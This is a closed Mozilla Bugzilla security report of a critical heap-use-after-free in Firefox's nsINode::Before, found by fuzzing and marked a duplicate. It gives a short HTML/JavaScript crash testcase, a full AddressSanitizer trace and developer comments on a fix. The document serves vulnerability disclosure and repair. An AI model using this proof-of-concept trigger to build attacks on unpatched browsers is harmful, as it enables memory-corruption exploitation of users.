Closed
Bug 1303168
Opened 9 years ago
Closed 9 years ago
heap-use-after-free in nsINode::Before
Categories
(Core :: DOM: Core & HTML, defect, P1)
Core
DOM: Core & HTML
Tracking
()
RESOLVED
DUPLICATE
of bug 1301777
| Tracking | Status | |
|---|---|---|
| firefox51 | --- | affected |
People
(Reporter: nils, Assigned: edgar)
Details
(Keywords: csectype-uaf, reporter-external, sec-critical)
Attachments
(2 files)
|
440 bytes,
text/html
|
Details | |
|
972 bytes,
patch
|
mccr8
:
review+
|
Details | Diff | Splinter Review |
The following testcase crashes the latest ASAN build of Firefox (BuildID=20160914134208) as follows. The fuzzPriv extension is required for the testcase.
crash.html:
<script>
function start() {
o555=(new DOMParser()).parseFromString('','text/html');
o557=o555.all[1];
o557.addEventListener('DOMNodeInserted',f1);
o1899=(new DOMParser()).parseFromString('','text/html');
o1902=o1899.all[2];
o1902['before'](undefined,undefined,16,1,undefined);
o1902['before'](undefined,o557,undefined,8388613,8,1e100);
}
function f1() {
o1899.normalize();
fuzzPriv.CC();
}
</script>
<body onload="start()"></body>
ASAN output:
=================================================================
==11516==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d0000c6d68 at pc 0x7f8ff8b1cd56 bp 0x7ffc8179ca70 sp 0x7ffc8179ca68
READ of size 8 at 0x60d0000c6d68 thread T0 (Web Content)
#0 0x7f8ff8b1cd55 in nsINode::Before(mozilla::dom::Sequence<mozilla::dom::OwningNodeOrString> const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1772:27
#1 0x7f8ffa42362b in mozilla::dom::ElementBinding::before(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:3518:3
#2 0x7f8ffa81e5b0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2812:13
#3 0x7f900093361c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:235:15
#4 0x7f900093361c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442
#5 0x7f90009133a0 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
#6 0x7f90009133a0 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2918
#7 0x7f90008f893b in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:400:12
#8 0x7f9000933e34 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
#9 0x7f90009348a1 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
#10 0x7f9000432a38 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2835:12
#11 0x7f8ffa35b878 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
#12 0x7f8ffac77041 in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
#13 0x7f8ffac77041 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
#14 0x7f8ffac43994 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1133:16
#15 0x7f8ffac454c1 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
#16 0x7f8ffac2e7b2 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
#17 0x7f8ffac32c9d in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
#18 0x7f8ffce711a8 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:998:7
#19 0x7f8ffdbef9dc in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7606:5
#20 0x7f8ffdbeb998 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7406:7
#21 0x7f8ffdbf2d7f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7303:13
#22 0x7f8ff7b2e6c0 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
#23 0x7f8ff7b2d688 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
#24 0x7f8ff7b2a43c in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
#25 0x7f8ff7b2c514 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
#26 0x7f8ff7b2d09c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
#27 0x7f8ff5f890eb in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
#28 0x7f8ff8a6b1bf in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8640:7
#29 0x7f8ff8b56bff in nsUnblockOnloadEvent::Run() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8593:5
#30 0x7f8ff5dae72d in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1059:7
#31 0x7f8ff5e2cfac in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
#32 0x7f8ff6b7111f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
#33 0x7f8ff6ae4398 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
#34 0x7f8ff6ae4398 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
#35 0x7f8ff6ae4398 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
#36 0x7f8ffc593e0f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
#37 0x7f8ffe6d6e97 in XRE_RunAppShell /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:875:12
#38 0x7f8ff6ae4398 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
#39 0x7f8ff6ae4398 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
#40 0x7f8ff6ae4398 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
#41 0x7f8ffe6d63bd in XRE_InitChildProcess /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:705:7
#42 0x4dfb2b in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:197:19
#43 0x4dfb2b in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:367
#44 0x7f901130a82f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
#45 0x41ba08 in _start (/home/nils/fuzzer3/firefox/firefox+0x41ba08)
0x60d0000c6d68 is located 56 bytes inside of 136-byte region [0x60d0000c6d30,0x60d0000c6db8)
freed by thread T0 (Web Content) here:
#0 0x4b215b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
#1 0x7f8ff5c8a084 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2681:9
#2 0x7f8ff5c89c76 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2855:3
#3 0x7f8ff5c9049c in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3832:3
#4 0x7f8ff5c8fc7c in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3657:9
#5 0x7f8ff5c92e56 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4148:3
#6 0x7f8ff8b32ed9 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1440:3
#7 0x7f8ff86b181d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1338:3
#8 0x7f8ff5dd4486 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_x86_64_unix.cpp:180:23
#9 0x7f8ff76fc3ae in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2065:12
#10 0x7f8ff76fc3ae in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1384
#11 0x7f8ff76fc3ae in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1351
#12 0x7f8ff7703acb in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1143:12
#13 0x7f900093361c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:235:15
#14 0x7f900093361c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442
#15 0x7f90009133a0 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
#16 0x7f90009133a0 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2918
#17 0x7f90008f893b in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:400:12
#18 0x7f9000933e34 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
#19 0x7f90009348a1 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
#20 0x7f90004304da in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2776:12
#21 0x7f8ff76371af in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:353:18
#22 0x7f900093361c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:235:15
#23 0x7f900093361c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442
#24 0x7f90009133a0 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
#25 0x7f90009133a0 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2918
#26 0x7f90008f893b in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:400:12
#27 0x7f9000933e34 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
#28 0x7f90009348a1 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
#29 0x7f9000432a38 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2835:12
#30 0x7f8ffa35e11d in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
#31 0x7f8ffac43949 in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:64:12
#32 0x7f8ffac43949 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1129
#33 0x7f8ffac454c1 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
#34 0x7f8ffac2e7b2 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
#35 0x7f8ffac32c9d in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
#36 0x7f8ffac35038 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:777:12
previously allocated by thread T0 (Web Content) here:
#0 0x4b247b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
#1 0x4e0bcd in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
#2 0x7f8ff8a487ed in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
#3 0x7f8ff8a487ed in nsIDocument::CreateTextNode(nsAString_internal const&) const /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5511
#4 0x7f8ff8b1d15f in GetNodeFromNodeOrString /home/worker/workspace/build/src/dom/base/nsINode.cpp:1672:7
#5 0x7f8ff8b1d15f in ConvertNodesOrStringsIntoNode(mozilla::dom::Sequence<mozilla::dom::OwningNodeOrString> const&, nsIDocument*, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1696
#6 0x7f8ff8b1cb6d in nsINode::Before(mozilla::dom::Sequence<mozilla::dom::OwningNodeOrString> const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1767:5
#7 0x7f8ffa42362b in mozilla::dom::ElementBinding::before(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:3518:3
#8 0x7f8ffa81e5b0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2812:13
#9 0x7f900093361c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:235:15
#10 0x7f900093361c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442
#11 0x7f90009133a0 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
#12 0x7f90009133a0 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2918
#13 0x7f90008f893b in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:400:12
#14 0x7f9000933e34 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
#15 0x7f90009348a1 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
#16 0x7f9000432a38 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2835:12
#17 0x7f8ffa35b878 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
#18 0x7f8ffac77041 in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
#19 0x7f8ffac77041 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
#20 0x7f8ffac43994 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1133:16
#21 0x7f8ffac454c1 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
#22 0x7f8ffac2e7b2 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
#23 0x7f8ffac32c9d in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
#24 0x7f8ffce711a8 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:998:7
#25 0x7f8ffdbef9dc in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7606:5
#26 0x7f8ffdbeb998 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7406:7
#27 0x7f8ffdbf2d7f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7303:13
#28 0x7f8ff7b2e6c0 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
#29 0x7f8ff7b2d688 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
#30 0x7f8ff7b2a43c in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
#31 0x7f8ff7b2c514 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
#32 0x7f8ff7b2d09c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
#33 0x7f8ff5f890eb in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
#34 0x7f8ff8a6b1bf in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8640:7
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsINode.cpp:1772:27 in nsINode::Before(mozilla::dom::Sequence<mozilla::dom::OwningNodeOrString> const&, mozilla::ErrorResult&)
Shadow bytes around the buggy address:
0x0c1a80010d50: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c1a80010d60: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
0x0c1a80010d70: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1a80010d80: 00 00 00 fa fa fa fa fa fa fa fa fa 00 00 00 00
0x0c1a80010d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa
=>0x0c1a80010da0: fa fa fa fa fa fa fd fd fd fd fd fd fd[fd]fd fd
0x0c1a80010db0: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
0x0c1a80010dc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c1a80010dd0: fd fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
0x0c1a80010de0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
0x0c1a80010df0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==11516==ABORTING
|
||
Updated•9 years ago
|
Group: core-security → dom-core-security
Keywords: csectype-uaf,
sec-critical
|
Assignee | |
Updated•9 years ago
|
Assignee: nobody → echen
|
||
Updated•9 years ago
|
Priority: -- → P1
|
|
Assignee | |
Comment 1•9 years ago
|
||
nsINode::Before must keeps the viablePreviousSibling alive.
|
|
Assignee | |
Comment 2•9 years ago
|
||
|
|
Assignee | |
Updated•9 years ago
|
Attachment #8794040 -
Flags: review?(continuation)
|
|
Assignee | |
Updated•9 years ago
|
Attachment #8794040 -
Flags: sec-approval?
|
|
||
Updated•9 years ago
|
Attachment #8794040 -
Flags: review?(continuation) → review+
|
||
Comment 3•9 years ago
|
||
argh, this is a dup of a bug I have patch for, and that patch is reviewed...
|
|
||
Comment 4•9 years ago
|
||
Er, it is Bug 1301777.
|
|
||
Updated•9 years ago
|
Status: NEW → RESOLVED
Closed: 9 years ago
Resolution: --- → DUPLICATE
|
|
||
Comment 6•9 years ago
|
||
Comment on attachment 8794040 [details] [diff] [review]
Patch, v1
Sorry, I should have remembered that. I knew there was another similar issue but I didn't realize it was identical.
Attachment #8794040 -
Flags: sec-approval?
|
||
Updated•9 years ago
|
Flags: sec-bounty?
|
||
Updated•9 years ago
|
Flags: sec-bounty? → sec-bounty-
|
|
||
Updated•7 years ago
|
Group: dom-core-security
|
||
Updated•1 year ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•